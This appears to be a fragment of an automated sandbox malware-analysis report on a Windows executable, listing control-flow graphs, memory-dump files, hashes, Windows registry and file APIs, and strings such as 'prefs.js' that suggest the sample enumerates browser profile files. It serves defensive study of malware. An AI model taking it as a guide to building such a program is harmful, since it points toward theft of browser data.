                                                                                                    • Opcode Fuzzy Hash: 0873a3fb5bbb520a30d261d12c2612c28bb7750a3105e5d7ddf57a5f45584eca
                                                                                                    • Instruction Fuzzy Hash: 4B927E32605BC589EB609F25E8843EDB3A1FB49B88F544235DB9C4BB99EF38D644C310

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1285 7ff75a6a2ca0-7ff75a6a2d72 1286 7ff75a6a2d75-7ff75a6a2d7c 1285->1286 1286->1286 1287 7ff75a6a2d7e-7ff75a6a2efe call 7ff75a6b86b0 1286->1287 1290 7ff75a6a2f01-7ff75a6a2f09 1287->1290 1290->1290 1291 7ff75a6a2f0b-7ff75a6a2f93 call 7ff75a6b86b0 1290->1291 1294 7ff75a6a2f96-7ff75a6a2f9e 1291->1294 1294->1294 1295 7ff75a6a2fa0-7ff75a6a302a call 7ff75a6b86b0 RegOpenKeyExA 1294->1295 1298 7ff75a6a3030-7ff75a6a3072 RegQueryValueExA 1295->1298 1299 7ff75a6a30ee-7ff75a6a30f5 1295->1299 1298->1299 1300 7ff75a6a3074-7ff75a6a30b2 call 7ff75a6b86b0 call 7ff75a6b28e0 1298->1300 1301 7ff75a6a30f7 RegCloseKey 1299->1301 1302 7ff75a6a30fd-7ff75a6a3168 call 7ff75a6c5c20 1299->1302 1318 7ff75a6a30b4-7ff75a6a30c5 1300->1318 1319 7ff75a6a30e5-7ff75a6a30ea 1300->1319 1301->1302 1307 7ff75a6a316a-7ff75a6a317c 1302->1307 1308 7ff75a6a319c-7ff75a6a31af 1302->1308 1310 7ff75a6a3197 call 7ff75a71e880 1307->1310 1311 7ff75a6a317e-7ff75a6a3191 1307->1311 1312 7ff75a6a31b5-7ff75a6a31f5 call 7ff75a69eaf0 1308->1312 1313 7ff75a6a382b-7ff75a6a3836 1308->1313 1310->1308 1311->1310 1315 7ff75a6a39d1-7ff75a6a39d6 call 7ff75a708254 1311->1315 1334 7ff75a6a39a7-7ff75a6a39a9 1312->1334 1335 7ff75a6a31fb-7ff75a6a31fe 1312->1335 1320 7ff75a6a3838-7ff75a6a384e 1313->1320 1321 7ff75a6a386e-7ff75a6a3890 1313->1321 1341 7ff75a6a39d7-7ff75a6a39e9 call 7ff75a69e1d0 1315->1341 1325 7ff75a6a30e0 call 7ff75a71e880 1318->1325 1326 7ff75a6a30c7-7ff75a6a30da 1318->1326 1319->1299 1327 7ff75a6a3850-7ff75a6a3863 1320->1327 1328 7ff75a6a3869 call 7ff75a71e880 1320->1328 1322 7ff75a6a3892-7ff75a6a38a6 1321->1322 1323 7ff75a6a38c6-7ff75a6a38e0 1321->1323 1330 7ff75a6a38c1 call 7ff75a71e880 1322->1330 1331 7ff75a6a38a8-7ff75a6a38bb 1322->1331 1332 7ff75a6a38e2-7ff75a6a38f6 1323->1332 1333 7ff75a6a3916-7ff75a6a3930 1323->1333 1325->1319 1326->1325 1336 7ff75a6a39cb-7ff75a6a39d0 call 7ff75a708254 1326->1336 1327->1328 1338 7ff75a6a39f0-7ff75a6a39f5 call 7ff75a708254 1327->1338 1328->1321 1330->1323 1331->1330 1342 7ff75a6a3a1e-7ff75a6a3a23 call 7ff75a708254 1331->1342 1346 7ff75a6a3911 call 7ff75a71e880 1332->1346 1347 7ff75a6a38f8-7ff75a6a390b 1332->1347 1350 7ff75a6a3962-7ff75a6a39a6 call 7ff75a71e860 1333->1350 1351 7ff75a6a3932-7ff75a6a3946 1333->1351 1343 7ff75a6a39b6-7ff75a6a39ca call 7ff75a69e240 1334->1343 1344 7ff75a6a39ab 1334->1344 1335->1313 1349 7ff75a6a3204-7ff75a6a322b call 7ff75a69d020 1335->1349 1336->1315 1367 7ff75a6a39f6-7ff75a6a3a05 call 7ff75a69e1d0 1338->1367 1373 7ff75a6a39ea-7ff75a6a39ef call 7ff75a708254 1341->1373 1356 7ff75a6a3a24-7ff75a6a3a29 call 7ff75a708254 1342->1356 1343->1336 1344->1313 1346->1333 1347->1346 1347->1356 1376 7ff75a6a329c-7ff75a6a3305 call 7ff75a6a6940 call 7ff75a6b5140 1349->1376 1377 7ff75a6a322d 1349->1377 1361 7ff75a6a3948-7ff75a6a395b 1351->1361 1362 7ff75a6a395d call 7ff75a71e880 1351->1362 1361->1362 1371 7ff75a6a39b0-7ff75a6a39b5 call 7ff75a708254 1361->1371 1362->1350 1385 7ff75a6a3a06-7ff75a6a3a0b call 7ff75a708254 1367->1385 1371->1343 1373->1338 1376->1341 1395 7ff75a6a330b-7ff75a6a331a 1376->1395 1383 7ff75a6a3230-7ff75a6a3237 1377->1383 1387 7ff75a6a323f-7ff75a6a3246 1383->1387 1388 7ff75a6a3239-7ff75a6a323d 1383->1388 1397 7ff75a6a3a0c-7ff75a6a3a11 call 7ff75a708254 1385->1397 1387->1383 1389 7ff75a6a3248-7ff75a6a324b 1387->1389 1388->1387 1388->1389 1389->1376 1392 7ff75a6a324d 1389->1392 1396 7ff75a6a3250-7ff75a6a325c 1392->1396 1399 7ff75a6a3352-7ff75a6a3382 1395->1399 1400 7ff75a6a331c-7ff75a6a3332 1395->1400 1401 7ff75a6a326e-7ff75a6a3271 1396->1401 1402 7ff75a6a325e-7ff75a6a3262 1396->1402 1410 7ff75a6a3a12-7ff75a6a3a17 call 7ff75a708254 1397->1410 1407 7ff75a6a3384-7ff75a6a3388 1399->1407 1408 7ff75a6a338c-7ff75a6a33cb call 7ff75a69e8c0 1399->1408 1404 7ff75a6a3334-7ff75a6a3347 1400->1404 1405 7ff75a6a334d call 7ff75a71e880 1400->1405 1401->1376 1409 7ff75a6a3273-7ff75a6a3277 1401->1409 1402->1401 1406 7ff75a6a3264-7ff75a6a326a 1402->1406 1404->1373 1404->1405 1405->1399 1406->1396 1412 7ff75a6a326c 1406->1412 1407->1408 1420 7ff75a6a33da-7ff75a6a3404 call 7ff75a69e9a0 1408->1420 1421 7ff75a6a33cd-7ff75a6a33d6 1408->1421 1414 7ff75a6a3280-7ff75a6a328c 1409->1414 1422 7ff75a6a3a18-7ff75a6a3a1d call 7ff75a69cf70 1410->1422 1412->1376 1417 7ff75a6a3294-7ff75a6a329a 1414->1417 1418 7ff75a6a328e-7ff75a6a3292 1414->1418 1417->1376 1417->1414 1418->1376 1418->1417 1427 7ff75a6a340a 1420->1427 1428 7ff75a6a3789-7ff75a6a3793 1420->1428 1421->1420 1422->1342 1431 7ff75a6a3410-7ff75a6a3431 call 7ff75a69eaf0 1427->1431 1429 7ff75a6a37bf-7ff75a6a37c9 1428->1429 1430 7ff75a6a3795-7ff75a6a379f 1428->1430 1434 7ff75a6a37f5-7ff75a6a37fc 1429->1434 1435 7ff75a6a37cb-7ff75a6a37d5 1429->1435 1430->1429 1433 7ff75a6a37a1-7ff75a6a37b3 1430->1433 1439 7ff75a6a3441-7ff75a6a3444 1431->1439 1440 7ff75a6a3433-7ff75a6a343b 1431->1440 1433->1429 1445 7ff75a6a37b5-7ff75a6a37be 1433->1445 1434->1313 1437 7ff75a6a37fe-7ff75a6a3808 1434->1437 1435->1434 1438 7ff75a6a37d7-7ff75a6a37e9 1435->1438 1437->1313 1441 7ff75a6a380a-7ff75a6a381e 1437->1441 1438->1434 1447 7ff75a6a37eb-7ff75a6a37f4 1438->1447 1443 7ff75a6a344a-7ff75a6a3461 call 7ff75a6ef8f0 1439->1443 1444 7ff75a6a3769-7ff75a6a3783 call 7ff75a69e7b0 1439->1444 1440->1367 1440->1439 1441->1313 1453 7ff75a6a3820-7ff75a6a382a 1441->1453 1456 7ff75a6a3467-7ff75a6a34b0 call 7ff75a6b3a40 call 7ff75a69d4e0 call 7ff75a69d370 1443->1456 1457 7ff75a6a375d-7ff75a6a3764 call 7ff75a69f380 1443->1457 1444->1428 1444->1431 1445->1429 1447->1434 1453->1313 1466 7ff75a6a34b2 1456->1466 1467 7ff75a6a34b5-7ff75a6a3554 call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 1456->1467 1457->1444 1466->1467 1478 7ff75a6a3556-7ff75a6a3567 1467->1478 1479 7ff75a6a3587-7ff75a6a359f 1467->1479 1480 7ff75a6a3582 call 7ff75a71e880 1478->1480 1481 7ff75a6a3569-7ff75a6a357c 1478->1481 1482 7ff75a6a35d2-7ff75a6a35ea 1479->1482 1483 7ff75a6a35a1-7ff75a6a35b2 1479->1483 1480->1479 1481->1385 1481->1480 1486 7ff75a6a3622-7ff75a6a3643 1482->1486 1487 7ff75a6a35ec-7ff75a6a3602 1482->1487 1484 7ff75a6a35b4-7ff75a6a35c7 1483->1484 1485 7ff75a6a35cd call 7ff75a71e880 1483->1485 1484->1397 1484->1485 1485->1482 1486->1422 1492 7ff75a6a3649-7ff75a6a375c call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6b29b0 call 7ff75a6b1900 call 7ff75a6b29b0 call 7ff75a6b1900 call 7ff75a6b17a0 call 7ff75a6b3ff0 1486->1492 1490 7ff75a6a3604-7ff75a6a3617 1487->1490 1491 7ff75a6a361d call 7ff75a71e880 1487->1491 1490->1410 1490->1491 1491->1486 1492->1457
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                    • String ID: content$directory_iterator::directory_iterator$exists$filename$status
                                                                                                    • API String ID: 1254564140-3429737954
                                                                                                    • Opcode ID: bccbaa4cb4d18e6557651bde58cbd3850779667ddbdad3e07abce0f14d6705b0
                                                                                                    • Instruction ID: 04d3f45c4443c8e62e087f49c27fe5556c17108ead0fd51802bc2ac295d91ebb
                                                                                                    • Opcode Fuzzy Hash: bccbaa4cb4d18e6557651bde58cbd3850779667ddbdad3e07abce0f14d6705b0
                                                                                                    • Instruction Fuzzy Hash: 4D829072A15BC589EB209F34D8803EDB3A1FB89B98F545275EA9D07B99DF38D580C340

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1514 7ff75a6a20b0-7ff75a6a2182 1515 7ff75a6a2185-7ff75a6a218c 1514->1515 1515->1515 1516 7ff75a6a218e-7ff75a6a22ea call 7ff75a6b86b0 1515->1516 1519 7ff75a6a22f0-7ff75a6a22f8 1516->1519 1519->1519 1520 7ff75a6a22fa-7ff75a6a2378 call 7ff75a6b86b0 1519->1520 1523 7ff75a6a2380-7ff75a6a2388 1520->1523 1523->1523 1524 7ff75a6a238a-7ff75a6a2411 call 7ff75a6b86b0 RegOpenKeyExA 1523->1524 1527 7ff75a6a2417-7ff75a6a2456 RegQueryValueExA 1524->1527 1528 7ff75a6a24ee-7ff75a6a24f5 1524->1528 1527->1528 1529 7ff75a6a245c-7ff75a6a24a9 call 7ff75a6b86b0 call 7ff75a6b28e0 1527->1529 1530 7ff75a6a24f7 RegCloseKey 1528->1530 1531 7ff75a6a24fd-7ff75a6a256e call 7ff75a6c5c20 1528->1531 1547 7ff75a6a24df-7ff75a6a24e7 1529->1547 1548 7ff75a6a24ab-7ff75a6a24bf 1529->1548 1530->1531 1536 7ff75a6a2570-7ff75a6a2582 1531->1536 1537 7ff75a6a25a2-7ff75a6a25b5 1531->1537 1539 7ff75a6a2584-7ff75a6a2597 1536->1539 1540 7ff75a6a259d call 7ff75a71e880 1536->1540 1541 7ff75a6a2aa3-7ff75a6a2aae 1537->1541 1542 7ff75a6a25bb-7ff75a6a2601 call 7ff75a69eaf0 1537->1542 1539->1540 1544 7ff75a6a2c55-7ff75a6a2c5a call 7ff75a708254 1539->1544 1540->1537 1549 7ff75a6a2ab0-7ff75a6a2ac9 1541->1549 1550 7ff75a6a2ae9-7ff75a6a2b0e 1541->1550 1566 7ff75a6a2c25-7ff75a6a2c27 1542->1566 1567 7ff75a6a2607-7ff75a6a260a 1542->1567 1570 7ff75a6a2c5b-7ff75a6a2c70 call 7ff75a69e1d0 1544->1570 1547->1528 1555 7ff75a6a24c1-7ff75a6a24d4 1548->1555 1556 7ff75a6a24da call 7ff75a71e880 1548->1556 1557 7ff75a6a2ae4 call 7ff75a71e880 1549->1557 1558 7ff75a6a2acb-7ff75a6a2ade 1549->1558 1552 7ff75a6a2b10-7ff75a6a2b24 1550->1552 1553 7ff75a6a2b44-7ff75a6a2b5e 1550->1553 1562 7ff75a6a2b3f call 7ff75a71e880 1552->1562 1563 7ff75a6a2b26-7ff75a6a2b39 1552->1563 1564 7ff75a6a2b60-7ff75a6a2b74 1553->1564 1565 7ff75a6a2b94-7ff75a6a2bae 1553->1565 1555->1556 1568 7ff75a6a2c4f-7ff75a6a2c54 call 7ff75a708254 1555->1568 1556->1547 1557->1550 1558->1557 1559 7ff75a6a2c71-7ff75a6a2c76 call 7ff75a708254 1558->1559 1597 7ff75a6a2c77-7ff75a6a2c7c call 7ff75a708254 1559->1597 1562->1553 1563->1562 1571 7ff75a6a2c8f-7ff75a6a2c94 call 7ff75a708254 1563->1571 1576 7ff75a6a2b8f call 7ff75a71e880 1564->1576 1577 7ff75a6a2b76-7ff75a6a2b89 1564->1577 1579 7ff75a6a2be0-7ff75a6a2c24 call 7ff75a71e860 1565->1579 1580 7ff75a6a2bb0-7ff75a6a2bc4 1565->1580 1572 7ff75a6a2c34-7ff75a6a2c4e call 7ff75a69e240 1566->1572 1573 7ff75a6a2c29 1566->1573 1567->1541 1578 7ff75a6a2610-7ff75a6a262d call 7ff75a6b5140 1567->1578 1568->1544 1570->1559 1587 7ff75a6a2c95-7ff75a6a2c9a call 7ff75a708254 1571->1587 1572->1568 1573->1541 1576->1565 1577->1576 1577->1587 1578->1570 1605 7ff75a6a2633-7ff75a6a264e 1578->1605 1590 7ff75a6a2bc6-7ff75a6a2bd9 1580->1590 1591 7ff75a6a2bdb call 7ff75a71e880 1580->1591 1590->1591 1601 7ff75a6a2c2e-7ff75a6a2c33 call 7ff75a708254 1590->1601 1591->1579 1610 7ff75a6a2c7d-7ff75a6a2c82 call 7ff75a708254 1597->1610 1601->1572 1608 7ff75a6a2650-7ff75a6a2654 1605->1608 1609 7ff75a6a2658-7ff75a6a268e call 7ff75a69e8c0 1605->1609 1608->1609 1614 7ff75a6a2690-7ff75a6a2699 1609->1614 1615 7ff75a6a269d-7ff75a6a26be call 7ff75a69e9a0 1609->1615 1618 7ff75a6a2c83-7ff75a6a2c88 call 7ff75a708254 1610->1618 1614->1615 1622 7ff75a6a2a01-7ff75a6a2a0b 1615->1622 1623 7ff75a6a26c4-7ff75a6a26c8 1615->1623 1624 7ff75a6a2c89-7ff75a6a2c8e call 7ff75a69cf70 1618->1624 1625 7ff75a6a2a37-7ff75a6a2a41 1622->1625 1626 7ff75a6a2a0d-7ff75a6a2a17 1622->1626 1627 7ff75a6a26d0-7ff75a6a26e5 call 7ff75a6ef8f0 1623->1627 1624->1571 1631 7ff75a6a2a43-7ff75a6a2a4d 1625->1631 1632 7ff75a6a2a6d-7ff75a6a2a74 1625->1632 1626->1625 1629 7ff75a6a2a19-7ff75a6a2a2b 1626->1629 1639 7ff75a6a26eb-7ff75a6a2737 call 7ff75a6b3a40 call 7ff75a69d4e0 call 7ff75a69d370 1627->1639 1640 7ff75a6a29de-7ff75a6a29fb call 7ff75a69f380 call 7ff75a69e7b0 1627->1640 1629->1625 1643 7ff75a6a2a2d-7ff75a6a2a36 1629->1643 1631->1632 1636 7ff75a6a2a4f-7ff75a6a2a61 1631->1636 1632->1541 1634 7ff75a6a2a76-7ff75a6a2a80 1632->1634 1634->1541 1637 7ff75a6a2a82-7ff75a6a2a96 1634->1637 1636->1632 1645 7ff75a6a2a63-7ff75a6a2a6c 1636->1645 1637->1541 1650 7ff75a6a2a98-7ff75a6a2aa2 1637->1650 1659 7ff75a6a2739 1639->1659 1660 7ff75a6a273c-7ff75a6a27db call 7ff75a6b5310 call 7ff75a6b55e0 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 1639->1660 1640->1622 1640->1627 1643->1625 1645->1632 1650->1541 1659->1660 1671 7ff75a6a280e-7ff75a6a2826 1660->1671 1672 7ff75a6a27dd-7ff75a6a27ee 1660->1672 1673 7ff75a6a2828-7ff75a6a2839 1671->1673 1674 7ff75a6a2859-7ff75a6a2871 1671->1674 1675 7ff75a6a27f0-7ff75a6a2803 1672->1675 1676 7ff75a6a2809 call 7ff75a71e880 1672->1676 1677 7ff75a6a2854 call 7ff75a71e880 1673->1677 1678 7ff75a6a283b-7ff75a6a284e 1673->1678 1679 7ff75a6a2873-7ff75a6a2889 1674->1679 1680 7ff75a6a28a9-7ff75a6a28c7 1674->1680 1675->1597 1675->1676 1676->1671 1677->1674 1678->1610 1678->1677 1683 7ff75a6a28a4 call 7ff75a71e880 1679->1683 1684 7ff75a6a288b-7ff75a6a289e 1679->1684 1680->1624 1685 7ff75a6a28cd-7ff75a6a29dd call 7ff75a6cd590 call 7ff75a6b86b0 call 7ff75a6b1900 call 7ff75a6b3ff0 call 7ff75a6b29b0 call 7ff75a6b1900 call 7ff75a6b29b0 call 7ff75a6b1900 call 7ff75a6b17a0 call 7ff75a6b3ff0 1680->1685 1683->1680 1684->1618 1684->1683 1685->1640
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$CloseOpenQueryValue
                                                                                                    • String ID: content$directory_iterator::directory_iterator$exists$filename
                                                                                                    • API String ID: 1254564140-1400943384
                                                                                                    • Opcode ID: 6b6d9910831da17615bf6fef016cb860db07f4e2ebd857ffc1e63b9f2287ad91
                                                                                                    • Instruction ID: bdd7c20e7c73617ccf87bf9d1e7ba0802dc8a0126b1d9b7898b9dd6a752b931e
                                                                                                    • Opcode Fuzzy Hash: 6b6d9910831da17615bf6fef016cb860db07f4e2ebd857ffc1e63b9f2287ad91
                                                                                                    • Instruction Fuzzy Hash: B5729272A14BC589EB109F35D8803ED77A1FB89B98F549235EA9D07BA9DF38D580C340

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1707 7ff75a6dd080-7ff75a6dd978 call 7ff75a69eaf0 * 2 1715 7ff75a6ddd92-7ff75a6dddbc call 7ff75a71e860 1707->1715 1716 7ff75a6dd97e-7ff75a6ddd49 call 7ff75a69d4e0 call 7ff75a69d370 call 7ff75a6dfdd0 call 7ff75a6ef8f0 call 7ff75a69f380 1707->1716 1732 7ff75a6ddd7b-7ff75a6ddd8b 1716->1732 1733 7ff75a6ddd4b-7ff75a6ddd5f 1716->1733 1732->1715 1734 7ff75a6ddd76 call 7ff75a71e880 1733->1734 1735 7ff75a6ddd61-7ff75a6ddd74 1733->1735 1734->1732 1735->1734 1736 7ff75a6dddbd-7ff75a6de39d call 7ff75a708254 call 7ff75a6b39b0 call 7ff75a6b79f0 call 7ff75a6b7ac0 call 7ff75a720e88 call 7ff75a69e1d0 * 3 call 7ff75a708254 * 4 call 7ff75a69e1d0 call 7ff75a708254 * 2 call 7ff75a69cf70 call 7ff75a708254 call 7ff75a69e1d0 call 7ff75a708254 * 2 call 7ff75a69cf70 call 7ff75a69d4e0 call 7ff75a69d370 1735->1736 1786 7ff75a6de3a0-7ff75a6de3a7 1736->1786 1786->1786 1787 7ff75a6de3a9-7ff75a6de5a8 call 7ff75a6c5c20 call 7ff75a69d810 call 7ff75a69da40 1786->1787 1794 7ff75a6de5b0-7ff75a6de5b8 1787->1794 1794->1794 1795 7ff75a6de5ba-7ff75a6de659 call 7ff75a6b86b0 call 7ff75a6c5c20 call 7ff75a69d810 call 7ff75a6ef020 1794->1795 1803 7ff75a6de65e-7ff75a6de98a call 7ff75a69da40 * 2 call 7ff75a6b2c80 1795->1803 1810 7ff75a6de990-7ff75a6de997 1803->1810 1810->1810 1811 7ff75a6de999-7ff75a6de9c7 call 7ff75a6b7600 1810->1811 1814 7ff75a6df363-7ff75a6df36e 1811->1814 1815 7ff75a6de9cd-7ff75a6de9dc call 7ff75a69ea50 1811->1815 1816 7ff75a6df370-7ff75a6df37a 1814->1816 1817 7ff75a6df3a2-7ff75a6df3c2 1814->1817 1815->1814 1824 7ff75a6de9e2-7ff75a6dea8e 1815->1824 1816->1817 1819 7ff75a6df37c 1816->1819 1820 7ff75a6df3c4-7ff75a6df3cd 1817->1820 1821 7ff75a6df3e1-7ff75a6df464 call 7ff75a69f380 call 7ff75a6b2880 call 7ff75a69da40 call 7ff75a6b2880 call 7ff75a71e860 1817->1821 1825 7ff75a6df384-7ff75a6df387 1819->1825 1820->1821 1832 7ff75a6df3cf-7ff75a6df3e0 1820->1832 1824->1814 1827 7ff75a6df477-7ff75a6df4f6 call 7ff75a69cf70 call 7ff75a69e240 call 7ff75a69e1d0 call 7ff75a708254 call 7ff75a6dce40 1824->1827 1825->1817 1828 7ff75a6df389-7ff75a6df3a0 1825->1828 1828->1825 1832->1821
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482774301.00007FF75A7A5000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482800950.00007FF75A7A8000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_10_2_7ff75a670000_xdnfl52f.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: cannot use push_back() with $directory_iterator::directory_iterator$exists$prefs.js$status
                                                                                                    • API String ID: 0-2713369562
                                                                                                    • Opcode ID: 70798774ab32343ea359809d6e97309927bf9168ba36e54582312949e83bb2b9
                                                                                                    • Instruction ID: 91363fe1800dd3699664173f2046f0b9b561c343c32b6dce74e82808f06b3395
                                                                                                    • Opcode Fuzzy Hash: 70798774ab32343ea359809d6e97309927bf9168ba36e54582312949e83bb2b9
                                                                                                    • Instruction Fuzzy Hash: 28524932909FC588E6B1AB14E8813EAB3A5FBC9784F545675DACC42B59EF3CC194CB10

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 1852 7ff75a72b5b0-7ff75a72b5f0 1853 7ff75a72b5f2-7ff75a72b5f9 1852->1853 1854 7ff75a72b605-7ff75a72b60e 1852->1854 1853->1854 1857 7ff75a72b5fb-7ff75a72b600 1853->1857 1855 7ff75a72b62a-7ff75a72b62c 1854->1855 1856 7ff75a72b610-7ff75a72b613 1854->1856 1859 7ff75a72b882 1855->1859 1860 7ff75a72b632-7ff75a72b636 1855->1860 1856->1855 1858 7ff75a72b615-7ff75a72b61d 1856->1858 1861 7ff75a72b884-7ff75a72b8aa call 7ff75a71e860 1857->1861 1863 7ff75a72b61f-7ff75a72b621 1858->1863 1864 7ff75a72b623-7ff75a72b626 1858->1864 1859->1861 1865 7ff75a72b70d-7ff75a72b734 call 7ff75a72b984 1860->1865 1866 7ff75a72b63c-7ff75a72b63f 1860->1866 1863->1855 1863->1864 1864->1855 1875 7ff75a72b756-7ff75a72b75f 1865->1875 1876 7ff75a72b736-7ff75a72b73f 1865->1876 1869 7ff75a72b641-7ff75a72b649 1866->1869 1870 7ff75a72b653-7ff75a72b665 GetFileAttributesExW 1866->1870 1869->1870 1872 7ff75a72b64b-7ff75a72b64d 1869->1872 1873 7ff75a72b667-7ff75a72b670 GetLastError 1870->1873 1874 7ff75a72b6b8-7ff75a72b6c7 1870->1874 1872->1865 1872->1870 1873->1861 1877 7ff75a72b676-7ff75a72b688 FindFirstFileW 1873->1877 1878 7ff75a72b6cb-7ff75a72b6cd 1874->1878 1883 7ff75a72b765-7ff75a72b77d GetFileInformationByHandleEx 1875->1883 1884 7ff75a72b813-7ff75a72b81c 1875->1884 1881 7ff75a72b741-7ff75a72b749 CloseHandle 1876->1881 1882 7ff75a72b74f-7ff75a72b751 1876->1882 1885 7ff75a72b68a-7ff75a72b690 GetLastError 1877->1885 1886 7ff75a72b695-7ff75a72b6b6 FindClose 1877->1886 1879 7ff75a72b6d9-7ff75a72b707 1878->1879 1880 7ff75a72b6cf-7ff75a72b6d7 1878->1880 1879->1859 1879->1865 1880->1865 1880->1879 1881->1882 1887 7ff75a72b8c5-7ff75a72b8ca call 7ff75a7098b4 1881->1887 1882->1861 1890 7ff75a72b77f-7ff75a72b78b GetLastError 1883->1890 1891 7ff75a72b7a5-7ff75a72b7be 1883->1891 1888 7ff75a72b81e-7ff75a72b832 GetFileInformationByHandleEx 1884->1888 1889 7ff75a72b86b-7ff75a72b86d 1884->1889 1885->1861 1886->1878 1912 7ff75a72b8cb-7ff75a72b8d0 call 7ff75a7098b4 1887->1912 1893 7ff75a72b858-7ff75a72b868 1888->1893 1894 7ff75a72b834-7ff75a72b840 GetLastError 1888->1894 1897 7ff75a72b8ab-7ff75a72b8af 1889->1897 1898 7ff75a72b86f-7ff75a72b873 1889->1898 1895 7ff75a72b78d-7ff75a72b798 CloseHandle 1890->1895 1896 7ff75a72b79e-7ff75a72b7a0 1890->1896 1891->1884 1899 7ff75a72b7c0-7ff75a72b7c4 1891->1899 1893->1889 1894->1896 1903 7ff75a72b846-7ff75a72b851 CloseHandle 1894->1903 1895->1896 1904 7ff75a72b8d7-7ff75a72b8df call 7ff75a7098b4 1895->1904 1896->1861 1900 7ff75a72b8be-7ff75a72b8c3 1897->1900 1901 7ff75a72b8b1-7ff75a72b8bc CloseHandle 1897->1901 1898->1859 1905 7ff75a72b875-7ff75a72b880 CloseHandle 1898->1905 1906 7ff75a72b80c 1899->1906 1907 7ff75a72b7c6-7ff75a72b7e0 GetFileInformationByHandleEx 1899->1907 1900->1861 1901->1887 1901->1900 1913 7ff75a72b8d1-7ff75a72b8d6 call 7ff75a7098b4 1903->1913 1914 7ff75a72b853 1903->1914 1905->1859 1905->1887 1911 7ff75a72b810 1906->1911 1909 7ff75a72b7e2-7ff75a72b7ee GetLastError 1907->1909 1910 7ff75a72b803-7ff75a72b80a 1907->1910 1909->1896 1916 7ff75a72b7f0-7ff75a72b7fb CloseHandle 1909->1916 1910->1911 1911->1884 1912->1913 1913->1904 1914->1896 1916->1912 1919 7ff75a72b801 1916->1919 1919->1896
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000A.00000002.2482594074.00007FF75A671000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF75A670000, based on PE: true
                                                                                                    • Associated: 0000000A.00000002.2482566622.00007FF75A670000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482672424.00007FF75A745000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482722327.00007FF75A7A0000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                    • Associated: 0000000A.00000002.2482748855.00007FF75A7A2000.00000008.00000001.01000000.0000000B.sdmpDownload File
